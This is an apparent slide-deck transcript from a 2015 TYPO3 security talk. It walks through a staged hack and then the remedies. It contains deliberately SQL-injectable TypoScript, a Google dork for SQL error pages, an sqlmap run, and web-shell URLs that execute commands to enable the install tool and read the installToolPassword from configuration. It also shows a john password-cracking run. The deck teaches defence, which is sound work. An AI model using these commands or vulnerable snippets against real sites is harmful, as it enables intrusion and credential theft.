Transcript
Inspiring people toshare
TYPO3 Developer Days 2015
Securtiy Forensics
TYPO3 Developer Days 2015
Helmut Hummel <typo3@helhum.io>
17.07.2015
Securtiy Forensics
1
Inspiring people toshare
#CertiFUNcation - Brühl 2015
Secure TYPO3
#CertiFUNcation 2015
Agenda• Diary of a Hack
• Pitfalls
• Best Practice
2
Diary of a Hack
3
Diary of a Hack
Day 1 - Implementing a feature
4
Diary of a Hack
5
lib.sqliSimple = CONTENT lib.sqliSimple { table = tt_content select.where.wrap = colPos=| select.where.data = GP:colPos }
Diary of a Hack
6
lib.sqliSearch = CONTENT lib.sqliSearch { table = tt_content select.where.wrap = header like '%|%' select.where.data = GP:search }
Diary of a Hack
Day 2 - Testing the feature
7
Diary of a Hack
8
Diary of a Hack
9
'BE/debug' => '1''FE/debug' => '1''SYS/devIPmask' => '*''SYS/displayErrors' => '1''SYS/sqlDebug' => '1''SYS/exceptionalErrors' => '28674'
Diary of a Hack
10
Diary of a Hack
11
'DB/username' => 'root'
Diary of a Hack
12
Diary of a Hack
Day 3 - Distraction
13
Diary of a Hack
14
Diary of a Hack
Day 4 - Attraction
15
Diary of a Hack
16
https://www.google.de/?q=exec_SELECTquery+%22You+have+an+error+in+your+SQL+syntax%22
Diary of a Hack
Day 5 - Exploitation
17
Disclaimer
18
Don’t do this at home!
19
Diary of a Hack
20
$ sqlmap -u 'http://security.dev/insecurity/?colPos=0' -p 'colPos'!GET parameter 'colPos' is vulnerable. Do you want to keep testing the others? [y/N] sqlmap identified the following injection points with a total of 30 HTTP(s) requests:
Diary of a Hack
21
Diary of a Hack
22
http://security.dev/tmpbrsru.php?cmd=touch%20typo3conf/ENABLE_INSTALL_TOOL!http://security.dev/typo3/sysext/install/Start/Install.php!http://security.dev/tmpbrsru.php?cmd=grep%20installToolPassword%20typo3conf/LocalConfiguration.php
Diary of a Hack
23
$ john pwLoaded 1 password hash (phpass MD5 [128/128 SSE2 intrinsics 4x4x5])password (dummy)guesses: 1 time: 0:00:00:01 DONE (Thu Jun 4 11:00:44 2015) c/s: 900 trying: 123456 - fishing
Diary of a Hack
24
Diary of a Hack
Day 5 - Discovery
25
Diary of a Hack
Discovery• Take site offline!
• seriously
• I mean it
26
27
Diary of a Hack
Day 6 - Analysis
28
Diary of a Hack
Analysis• Make a backup of current state (files, DB)
• Search all logs for „suspicious“ entries
• Try to reproduce assumed entry points
• If in doubt: get help
29
Diary of a Hack
Day 7 - Fix
30
Diary of a Hack
31
lib.sqliSimple = CONTENT lib.sqliSimple { table = tt_content select.where = colPos=###colPos### select.markers { colPos.data = GP:colPos } }
Diary of a Hack
32
lib.sqliSearch = CONTENT lib.sqliSearch { table = tt_content select.where = header like ###search### select.markers { search.data = GP:search search.wrap = %|% } }
Diary of a Hack
Fix• Close security issue in Code/ Extension/ Core
• Restore from backup
• Or if you really know what you are doing: cleanup installation
• Go online again
• Plan improvements (education, monitoring, …)
33
Thank you!@helhum
http://insight.helhum.io typo3@helhum.io
34
Inspiring people toshare
TYPO3 Developer Days 2015
Securtiy Forensics
Further Pitfalls
35
Inspiring people toshare
TYPO3 Developer Days 2015
Securtiy Forensics 36
Secure TYPO3
Types of Security Threats• Information disclosure
• SQL injection
• Cross Site Scripting (XSS)
• http://docs.typo3.org/typo3cms/SecurityGuide/TypesOfThreats/Index.html
• https://www.owasp.org/index.php/Category:Attack
37
Inspiring people toshare
TYPO3 Developer Days 2015
Securtiy Forensics
TypoScript
38
page.10 = TEXT page.10.field = title page.10.wrap = <h1 class="c-{field:layout}">|</h1> page.10.insertData = 1
39
page.10 = TEXT # title can contain: {DB:be_users:1:password} page.10.field = title page.10.wrap = <h1 class="c-{field:layout}">|</h1> page.10.insertData = 1
40
page.10 = TEXT page.10.field = title page.10.wrap = <h1 class="c-{field:layout}">|</h1> page.10.insertData = 1
41
page.10 = TEXT page.10.field = title page.10.dataWrap = <h1 class="c-{field:layout}">|</h1>
42
page.10 = TEXT # title can contain HTML page.10.field = title page.10.dataWrap = <h1 class="c-{field:layout}">|</h1>
43
page.10 = TEXT page.10.field = title page.10.dataWrap = <h1 class="c-{field:layout}">|</h1> page.10.htmlSpecialChars = 1
44
page.10 = TEXT page.10.field = title page.10.dataWrap = <h1 class="c-{field:layout}">|</h1> page.10.htmlSpecialChars = 1
45
page.10 = TEXT # Avoid dataWrap or insertData if possible # layout field might not be safe page.10.field = title page.10.dataWrap = <h1 class="c-{field:layout}">|</h1> page.10.htmlSpecialChars = 1
46
Inspiring people toshare
TYPO3 Developer Days 2015
Securtiy Forensics
Fluid
47
Inspiring people toshare
#CertiFUNcation - Brühl 2015
Secure TYPO3
Extbase
XSS even when using Fluid• Flash Messages
• HTML Context
• Custom View Helpers
48
Inspiring people toshare
TYPO3 Developer Days 2015
Securtiy Forensics
Best Practice
49
Inspiring people toshare
#CertiFUNcation - Brühl 2015
Secure TYPO3
Best Practice• Defined Process
• Regular updates
• Backups
• Monitoring
• Education
• Reserve time for all of the above
• More in: http://docs.typo3.org/typo3cms/SecurityGuide/
50
Questions?
51
Inspiring people toshare
#CertiFUNcation - Brühl 2015
Secure TYPO3
Secure TYPO3 - Diary of a Hack
Resources• http://sqlmap.org
• http://www.openwall.com/john/
• http://docs.typo3.org/typo3cms/SecurityGuide/
• https://www.owasp.org/
52
Thank you!@helhum
http://insight.helhum.io typo3@helhum.io
53
top related